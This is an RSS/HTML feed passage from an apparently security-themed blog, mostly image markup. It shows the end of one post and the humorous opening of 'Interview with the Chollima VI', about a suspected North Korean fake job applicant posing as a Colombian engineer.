data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/16fc820e-2574-4e85-baf7-644bd99eddf8_1179x508.png&quot;,&quot;srcNoWatermark&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/f3b14b15-329d-4c0e-9539-2950834acffc_1179x508.jpeg&quot;,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:508,&quot;width&quot;:1179,&quot;resizeWidth&quot;:450,&quot;bytes&quot;:100558,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/jpeg&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://quetzal.bitso.com/i/181261599?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff3b14b15-329d-4c0e-9539-2950834acffc_1179x508.jpeg&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!IS1h!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F16fc820e-2574-4e85-baf7-644bd99eddf8_1179x508.png 424w, https://substackcdn.com/image/fetch/$s_!IS1h!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F16fc820e-2574-4e85-baf7-644bd99eddf8_1179x508.png 848w, https://substackcdn.com/image/fetch/$s_!IS1h!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F16fc820e-2574-4e85-baf7-644bd99eddf8_1179x508.png 1272w, https://substackcdn.com/image/fetch/$s_!IS1h!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F16fc820e-2574-4e85-baf7-644bd99eddf8_1179x508.png 1456w" sizes="100vw" loading="lazy"></picture><div></div></div></a><figcaption class="image-caption">Threat Actor: Coward Chollima</figcaption></figure></div><p>I am still trying to figure out what kind of monsters would do that to innocent job-seekers.</p><div><hr></div><h2>The End</h2><p>This saga ends here.</p><p>The intel may be kept private, but the laughs should always be shared.</p><p>Stay safe. </p><p>Don&#8217;t hire spies. </p><p>Fight like a girl.</p><p>And don&#8217;t get rekdt.</p><div><hr></div><div class="captioned-image-container"><figure><a class="image-link image2" target="_blank" href="https://substackcdn.com/image/fetch/$s_!DR_F!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7121e32d-ff4e-41f8-a52c-bbe9cac0b68d_1280x1280.heic" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!DR_F!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7121e32d-ff4e-41f8-a52c-bbe9cac0b68d_1280x1280.heic 424w, https://substackcdn.com/image/fetch/$s_!DR_F!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7121e32d-ff4e-41f8-a52c-bbe9cac0b68d_1280x1280.heic 848w, https://substackcdn.com/image/fetch/$s_!DR_F!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7121e32d-ff4e-41f8-a52c-bbe9cac0b68d_1280x1280.heic 1272w, https://substackcdn.com/image/fetch/$s_!DR_F!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7121e32d-ff4e-41f8-a52c-bbe9cac0b68d_1280x1280.heic 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!DR_F!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7121e32d-ff4e-41f8-a52c-bbe9cac0b68d_1280x1280.heic" width="200" height="200" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/7121e32d-ff4e-41f8-a52c-bbe9cac0b68d_1280x1280.heic&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:1280,&quot;width&quot;:1280,&quot;resizeWidth&quot;:200,&quot;bytes&quot;:73912,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/heic&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://quetzal.bitso.com/i/181261599?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7121e32d-ff4e-41f8-a52c-bbe9cac0b68d_1280x1280.heic&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!DR_F!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7121e32d-ff4e-41f8-a52c-bbe9cac0b68d_1280x1280.heic 424w, https://substackcdn.com/image/fetch/$s_!DR_F!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7121e32d-ff4e-41f8-a52c-bbe9cac0b68d_1280x1280.heic 848w, https://substackcdn.com/image/fetch/$s_!DR_F!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7121e32d-ff4e-41f8-a52c-bbe9cac0b68d_1280x1280.heic 1272w, https://substackcdn.com/image/fetch/$s_!DR_F!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7121e32d-ff4e-41f8-a52c-bbe9cac0b68d_1280x1280.heic 1456w" sizes="100vw" loading="lazy"></picture><div></div></div></a></figure></div>]]></content:encoded></item><item><title><![CDATA[Interview with the Chollima VI]]></title><description><![CDATA[This franchise just gets better]]></description><link>https://quetzal.bitso.com/p/interview-with-the-chollima-vi</link><guid isPermaLink="false">https://quetzal.bitso.com/p/interview-with-the-chollima-vi</guid><dc:creator><![CDATA[Mauro Eldritch]]></dc:creator><pubDate>Mon, 10 Nov 2025 19:08:01 GMT</pubDate><enclosure url="https://substackcdn.com/image/fetch/$s_!s5sZ!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F44e89e4b-469d-48aa-b7b0-a209660ad95e_2704x1388.heic" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p>At the risk of turning this saga into one of those <em>yearly released B-movie slasher films</em>, here we are... <strong>yet again</strong>.</p><p>With the <em>same</em> plot. The same <em>bad</em> guys. The <em>same</em> outcome.</p><p>A <a href="https://static.wikia.nocookie.net/garfield/images/8/83/1981-11-23_Monday.jpg/revision/latest?cb=20230715032306">typical monday</a> for us, if you may ask. So let&#8217;s begin. </p><p><strong>A North Korean walks into an interview...</strong></p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!s5sZ!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F44e89e4b-469d-48aa-b7b0-a209660ad95e_2704x1388.heic" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!s5sZ!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F44e89e4b-469d-48aa-b7b0-a209660ad95e_2704x1388.heic 424w, https://substackcdn.com/image/fetch/$s_!s5sZ!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F44e89e4b-469d-48aa-b7b0-a209660ad95e_2704x1388.heic 848w, https://substackcdn.com/image/fetch/$s_!s5sZ!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F44e89e4b-469d-48aa-b7b0-a209660ad95e_2704x1388.heic 1272w, https://substackcdn.com/image/fetch/$s_!s5sZ!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F44e89e4b-469d-48aa-b7b0-a209660ad95e_2704x1388.heic 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!s5sZ!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F44e89e4b-469d-48aa-b7b0-a209660ad95e_2704x1388.heic" width="1456" height="747" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/44e89e4b-469d-48aa-b7b0-a209660ad95e_2704x1388.heic&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:747,&quot;width&quot;:1456,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:130930,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/heic&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:false,&quot;topImage&quot;:true,&quot;internalRedirect&quot;:&quot;https://quetzal.bitso.com/i/178512323?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F44e89e4b-469d-48aa-b7b0-a209660ad95e_2704x1388.heic&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!s5sZ!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F44e89e4b-469d-48aa-b7b0-a209660ad95e_2704x1388.heic 424w, https://substackcdn.com/image/fetch/$s_!s5sZ!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F44e89e4b-469d-48aa-b7b0-a209660ad95e_2704x1388.heic 848w, https://substackcdn.com/image/fetch/$s_!s5sZ!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F44e89e4b-469d-48aa-b7b0-a209660ad95e_2704x1388.heic 1272w, https://substackcdn.com/image/fetch/$s_!s5sZ!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F44e89e4b-469d-48aa-b7b0-a209660ad95e_2704x1388.heic 1456w" sizes="100vw" fetchpriority="high"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>He says his name is <strong>Jes&#250;s Sebasti&#225;n</strong>, from <a href="https://en.wikipedia.org/wiki/Barranquilla">Barranquilla</a>, <strong>Colombia</strong>, but his internet connection is awfully bad, as if he was bouncing <em>capriciously</em> from Asia to Europe, then to someone else&#8217;s laptop via <strong>AnyDesk</strong>.</p><p>He tried really hard to deal with the lag, but in the end we lost connection with him. Maybe he should have tried <strong>turning the router on and off again</strong>.</p><div class="native-video-embed" data-component-name="VideoPlaceholder" data-attrs="{&quot;mediaUploadId&quot;:&quot;30b56cc1-e272-4796-a03a-1a90ee99b2fe&quot;,&quot;duration&quot;:null}"></div><p>Just because he seemed like a <em>totally legit</em> guy, we&#8217;ll share his profile as well to help him find new opportunities. No profile picture though, but as you might have noticed in the tape, he&#8217;s a little shy.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!DuRY!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F6121f887-e839-4e34-860e-a3fe02fa66ad_1604x1200.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!DuRY!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F6121f887-e839-4e34-860e-a3fe02fa66ad_1604x1200.png 424w, https://substackcdn.com/image/fetch/$s_!DuRY!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F6121f887-e839-4e34-860e-a3fe02fa66ad_1604x1200.png 848w, https://substackcdn.com/image/fetch/$s_!DuRY!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F6121f887-e839-4e34-860e-a3fe02fa66ad_1604x1200.png 1272w, https://substackcdn.com/image/fetch/$s_!DuRY!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F6121f887-e839-4e34-860e-a3fe02fa66ad_1604x1200.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!DuRY!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F6121f887-e839-4e34-860e-a3fe02fa66ad_1604x1200.png" width="562" height="420.342032967033" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/6121f887-e839-4e34-860e-a3fe02fa66ad_1604x1200.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:1089,&quot;width&quot;:1456,&quot;resizeWidth&quot;:562,&quot;bytes&quot;:113504,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://quetzal.bitso.com/i/178512323?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F6121f887-e839-4e34-860e-a3fe02fa66ad_1604x1200.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!DuRY!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F6121f887-e839-4e34-860e-a3fe02fa66ad_1604x1200.png 424w, https://substackcdn.com/image/fetch/$s_!DuRY!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F6121f887-e839-4e34-860e-a3fe02fa66ad_1604x1200.png 848w, https://substackcdn.com/image/fetch/$s_!DuRY!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F6121f887-e839-4e34-860e-a3fe02fa66ad_1604x1200.png 1272w, https://substackcdn.com/image/fetch/$s_!DuRY!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F6121f887-e839-4e34-860e-a3fe02fa66ad_1604x1200.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>He has over 7 years of experience and even claims to have worked for Microsoft as an AI &amp; Software Engineer, an interesting flex.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!irh4!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fbfe11b1d-8457-421a-917f-e43f88326477_1610x1018.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!irh4!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fbfe11b1d-8457-421a-917f-e43f88326477_1610x1018.png 424w, https://substackcdn.com/image/fetch/$s_!irh4!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fbfe11b1d-8457-421a-917f-e43f88326477_1610x1018.png 848w, https://substackcdn.com/image/fetch/$s_!irh4!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fbfe11b1d-8457-421a-917f-e43f88326477_1610x1018.png 1272w, https://substackcdn.com/image/fetch/$s_!irh4!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fbfe11b1d-8457-421a-917f-e43f88326477_1610x1018.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!irh4!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fbfe11b1d-8457-421a-917f-e43f88326477_1610x1018.png" width="664" height="420.0164835164835" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/bfe11b1d-8457-421a-917f-e43f88326477_1610x1018.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:921,&quot;width&quot;:1456,&quot;resizeWidth&quot;:664,&quot;bytes&quot;:140931,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://quetzal.bitso.com/i/178512323?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fbfe11b1d-8457-421a-917f-e43f88326477_1610x1018.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!irh4!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fbfe11b1d-8457-421a-917f-e43f88326477_1610x1018.png 424w, https://substackcdn.com/image/fetch/$s_!irh4!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fbfe11b1d-8457-421a-917f-e43f88326477_1610x1018.png 848w, https://substackcdn.com/image/fetch/$s_!irh4!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fbfe11b1d-8457-421a-917f-e43f88326477_1610x1018.png 1272w, https://substackcdn.com/image/fetch/$s_!irh4!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fbfe11b1d-8457-421a-917f-e43f88326477_1610x1018.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>All those years in AI paid off, as he also sports a good and healthy sense of handcrafted nerd humour, ideal if you want the rest of your workforce to start their days with a smile and your chat channels drowning in AI-generated memes.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!7OY4!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F68ab0345-2d4d-4fc6-94a0-5c760c9c8ccd_1602x1370.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!7OY4!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F68ab0345-2d4d-4fc6-94a0-5c760c9c8ccd_1602x1370.png 424w, https://substackcdn.com/image/fetch/$s_!7OY4!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F68ab0345-2d4d-4fc6-94a0-5c760c9c8ccd_1602x1370.png 848w, https://substackcdn.com/image/fetch/$s_!7OY4!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F68ab0345-2d4d-4fc6-94a0-5c760c9c8ccd_1602x1370.png 1272w, https://substackcdn.com/image/fetch/$s_!7OY4!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F68ab0345-2d4d-4fc6-94a0-5c760c9c8ccd_1602x1370.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!7OY4!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F68ab0345-2d4d-4fc6-94a0-5c760c9c8ccd_1602x1370.png" width="1456" height="1245" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/68ab0345-2d4d-4fc6-94a0-5c760c9c8ccd_1602x1370.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:1245,&quot;width&quot;:1456,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:646094,&quot;alt&quot;:&quot;&quot;,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://quetzal.bitso.com/i/178512323?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F68ab0345-2d4d-4fc6-94a0-5c760c9c8ccd_1602x1370.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" title="" srcset="https://substackcdn.com/image/fetch/$s_!7OY4!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F68ab0345-2d4d-4fc6-94a0-5c760c9c8ccd_1602x1370.png 424w, https://substackcdn.com/image/fetch/$s_!7OY4!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F68ab0345-2d4d-4fc6-94a0-5c760c9c8ccd_1602x1370.png 848w, https://substackcdn.com/image/fetch/$s_!7OY4!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F68ab0345-2d4d-4fc6-94a0-5c760c9c8ccd_1602x1370.png 1272w, https://substackcdn.com/image/fetch/$s_!7OY4!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F68ab0345-2d4d-4fc6-94a0-5c760c9c8ccd_1602x1370.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container 